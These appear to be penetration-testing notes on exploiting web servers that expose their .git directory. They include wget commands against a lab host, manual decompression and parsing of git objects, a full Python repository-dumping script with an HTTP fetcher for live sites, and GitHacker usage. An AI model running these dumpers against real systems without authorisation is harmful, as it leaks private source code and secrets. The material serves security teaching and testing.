# Git

## Git Information Leak

If the web server exposes the `.git` directory and directory listing is enabled, we can download the whole directory recursively:

```bash
wget -r http://www.example.com/.git/
```

Only `.git` was fetched, so the working tree is empty: `git status` inside the downloaded directory lists every tracked file as deleted, and `git diff` (which shows changes between commits, between a commit and the working tree, etc.) prints their full contents as removed lines. `git checkout -- .` restores the files from the downloaded index:

```bash
git diff
```

{% hint style="warning" %}
With modern URL mapping (i.e. not relying on the filesystem), it's **less and less common** to see these types of issues, but it's always important to be on the lookout for them.
{% endhint %}

## Bypass Restrictions

If directory listing is disabled, start with these two files, which exist in every repository; a successful response for either confirms the leak:

* `.git/config`
* `.git/HEAD`

Access `https://www.example.com/.git/config`:

```
[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
```

Access `https://www.example.com/.git/HEAD`:

```
ref: refs/heads/master
```

Access `https://www.example.com/.git/refs/heads/master`:

```
5346cb2290d9918bfaad7318ebcb2498fe5ebe18
```

This is the hash of the commit at the tip of `master`. Git stores loose objects under `.git/objects/` using the first two hex characters of the hash as a subdirectory name and the remaining 38 as the file name, so `5346cb2290d9918bfaad7318ebcb2498fe5ebe18` lives at `.git/objects/53/46cb2290d9918bfaad7318ebcb2498fe5ebe18`. Download this commit:

```shell
wget https://ptl-8ddb9a66-9a79abff.libcurl.so/.git/objects/53/46cb2290d9918bfaad7318ebcb2498fe5ebe18
```

Loose objects are zlib-compressed (a raw zlib stream, not gzip, so `gunzip` rejects it), and coreutils ships no decompressor for that format. Ruby's zlib binding does the job:

```shell
$ ruby -rzlib -e 'print Zlib::Inflate.new.inflate(STDIN.read)' < 46cb2290d9918bfaad7318ebcb2498fe5ebe18

commit 199tree 58ace0476093d04023f84d7816adacfa7b879c43
author Louis Nyffenegger <louis@pentesterlab.com> 1652405113 +0000
committer Louis Nyffenegger <louis@pentesterlab.com> 1652405113 +0000

Initial import
```

The object header `commit 199` is separated from the body by a NUL byte that the terminal swallows, which is why it appears glued onto `tree`. That `tree` line gives us the next object to download: inflate it and run `strings -a` over the result, because a tree stores each entry's hash as 20 raw bytes rather than hex (the stray `s` and `3` in front of some modes below are the last byte of the preceding binary hash):

```shell
$ wget https://ptl-8ddb9a66-9a79abff.libcurl.so/.git/objects/58/ace0476093d04023f84d7816adacfa7b879c43
$ ruby -rzlib -e 'print Zlib::Inflate.new.inflate(STDIN.read)' < ace0476093d04023f84d7816adacfa7b879c43 | strings -a

tree 182
40000 css
100644 favicon.ico
s100644 footer.php
3100644 header.php
100644 index.php
```

We need the hash of each file, which `strings` cannot recover from the binary entries. The easiest way to read them is to let git parse the tree for us: create our own git repo and drop the downloaded objects in place:

```shell
mkdir hack ; cd hack ; git init
```

Copy files to it:

```shell
$ mkdir -p .git/objects/53 .git/objects/58
$ cp ../46cb2290d9918bfaad7318ebcb2498fe5ebe18 .git/objects/53/
$ cp ../ace0476093d04023f84d7816adacfa7b879c43 .git/objects/58/
```

Retrieve hashes:

```shell
$ git cat-file -p 58ace0476093d04023f84d7816adacfa7b879c43

040000 tree b352dde43705f193d2c1d4e6f6a133321186869f	css
100644 blob f303c6a7797f5e7a0d5bd31d39a7149366bbf873	favicon.ico
100644 blob 5adab1a1c52dc009d4f26bbce30dacc4c93eea33	footer.php
100644 blob c3646db7f9c7e6f126c75900fdcce16d50e1da82	header.php
100644 blob 88beb94b5e1fc48e1625c89f892b04bffb58225c	index.php
```

Just to save time, assume that we know the key is inside `header.php`. Create a directory and download this file:

```shell
mkdir .git/objects/c3 && wget https://ptl-8ddb9a66-9a79abff.libcurl.so/.git/objects/c3/646db7f9c7e6f126c75900fdcce16d50e1da82 -O .git/objects/c3/646db7f9c7e6f126c75900fdcce16d50e1da82
```

Examine source code:

```shell
git cat-file -p c3646db7f9c7e6f126c75900fdcce16d50e1da82
```
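The manual walk above (HEAD to ref to commit to tree to blobs, inflating each loose object by hand) is the whole technique. The following Python script is added here as an illustration; it is not part of the original notes or of PentesterLab's material. It automates the walk against a pluggable `fetch` function so the same code runs offline: `constructed_leak` builds an in-memory stand-in for a leaked `.git` (the file names, contents and hashes in it are constructed, not a real target), and `http_fetcher` wraps `urllib` for a live `.git` URL. Two things a practitioner wants that the manual walk skips: each downloaded object is checked against its SHA-1 (a truncated download otherwise yields a silently corrupt file), and when the loose `refs/heads/<branch>` file is missing the script falls back to `.git/packed-refs`, where git moves refs after `git gc`.

```python
import hashlib
import urllib.error
import urllib.request
import zlib

def loose_object(kind, payload):
    # git stores "<kind> <size>\0<payload>", SHA-1s that, then zlib-compresses it
    raw = b"%s %d\x00" % (kind.encode(), len(payload)) + payload
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)

def inflate_object(compressed, expected_sha=None):
    # Inverse of loose_object; the NUL after the header is what the terminal swallowed
    # when the Ruby output above printed "commit 199" glued onto "tree ..."
    raw = zlib.decompress(compressed)
    if expected_sha and hashlib.sha1(raw).hexdigest() != expected_sha:
        raise ValueError("hash mismatch: truncated or tampered object")
    header, _, payload = raw.partition(b"\x00")
    return header.split(b" ")[0].decode(), payload

def parse_commit(payload):
    # header lines ("tree", "parent", "author", ...), a blank line, then the message
    headers, _, message = payload.partition(b"\n\n")
    fields = [line.partition(b" ") for line in headers.split(b"\n")]
    return {"tree": next(v.decode() for k, _, v in fields if k == b"tree"),
            "parents": [v.decode() for k, _, v in fields if k == b"parent"],
            "message": message.decode(errors="replace")}

def parse_tree(payload):
    # entries are "<mode> <name>\0" + 20 raw hash bytes (not hex), hence strings -a above
    entries, i = [], 0
    while i < len(payload):
        nul = payload.index(b"\x00", i)
        mode, name = payload[i:nul].split(b" ", 1)
        entries.append((mode.decode(), name.decode(), payload[nul + 1:nul + 21].hex()))
        i = nul + 21
    return entries

def object_path(sha):
    # first two hex characters are the directory, the remaining 38 the file name
    return f".git/objects/{sha[:2]}/{sha[2:]}"

def resolve_head(fetch):
    # HEAD -> refs/heads/<branch> -> commit hash; after git gc the loose ref file is
    # gone and the hash sits in .git/packed-refs, so fall back to that
    head = fetch(".git/HEAD").strip()
    if not head.startswith(b"ref: "):
        return head.decode()  # detached HEAD holds the hash directly
    ref = head[5:].decode()
    loose = fetch(".git/" + ref)
    if loose is not None:
        return loose.strip().decode()
    for line in (fetch(".git/packed-refs") or b"").splitlines():
        if line.endswith(b" " + ref.encode()):
            return line.split(b" ")[0].decode()
    raise LookupError(f"cannot resolve {ref}")

def dump_tree(fetch, tree_sha, prefix=""):
    # recursively fetch a tree and every blob below it; returns {path: bytes}
    files = {}
    for mode, name, sha in parse_tree(inflate_object(fetch(object_path(tree_sha)), tree_sha)[1]):
        if mode == "40000":  # subdirectory (git cat-file prints it as 040000)
            files.update(dump_tree(fetch, sha, prefix + name + "/"))
        elif mode != "160000":  # 160000 is a submodule pointer with no blob to fetch
            files[prefix + name] = inflate_object(fetch(object_path(sha)), sha)[1]
    return files

def dump_repo(fetch):
    # the manual walk above in one call: HEAD -> commit -> tree -> blobs
    commit_sha = resolve_head(fetch)
    commit = parse_commit(inflate_object(fetch(object_path(commit_sha)), commit_sha)[1])
    return commit, dump_tree(fetch, commit["tree"])

def http_fetcher(base_url):
    # fetcher for a live target: GET <base_url>/<relpath>, None on 404
    def fetch(relpath):
        try:
            with urllib.request.urlopen(base_url.rstrip("/") + "/" + relpath) as resp:
                return resp.read()
        except urllib.error.HTTPError as err:
            if err.code == 404:
                return None
            raise
    return fetch

def constructed_leak():
    # constructed stand-in for a leaked .git (not a real target): one commit holding
    # header.php and css/style.css, with the ref already packed as after git gc
    store = {}
    def put(kind, payload):
        sha, compressed = loose_object(kind, payload)
        store[object_path(sha)] = compressed
        return sha
    css = put("blob", b"body { color: red; }\n")
    php = put("blob", b"<?php $key = 'example-key'; ?>\n")
    sub = put("tree", b"100644 style.css\x00" + bytes.fromhex(css))
    root = put("tree", b"40000 css\x00" + bytes.fromhex(sub) + b"100644 header.php\x00" + bytes.fromhex(php))
    commit = put("commit", b"tree %s\nauthor A <a@example.com> 0 +0000\n"
                 b"committer A <a@example.com> 0 +0000\n\nInitial import\n" % root.encode())
    store[".git/HEAD"] = b"ref: refs/heads/master\n"
    store[".git/packed-refs"] = b"# pack-refs with: peeled\n%s refs/heads/master\n" % commit.encode()
    return store.get
```

Against a real site, `dump_repo(http_fetcher("https://www.example.com"))` returns the commit metadata and a `{path: bytes}` map of the files at HEAD; walking `commit["parents"]` the same way recovers earlier revisions, which is where deleted secrets usually sit. The script only handles loose objects: anything git has already moved into a packfile under `.git/objects/pack/` needs the `.pack` and `.idx` files themselves, which is the gap tools like GitHacker fill.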

## GitHacker

[GitHacker](https://github.com/WangYihang/GitHacker) is a multithreaded tool that detects whether a site leaks its `.git` folder and downloads that folder almost completely. It also works when directory listing (`DirectoryListings`) is disabled.

**Installation:** `pip3 install GitHacker`

**Usage:** `githacker --url http://127.0.0.1/.git/ --folder result`

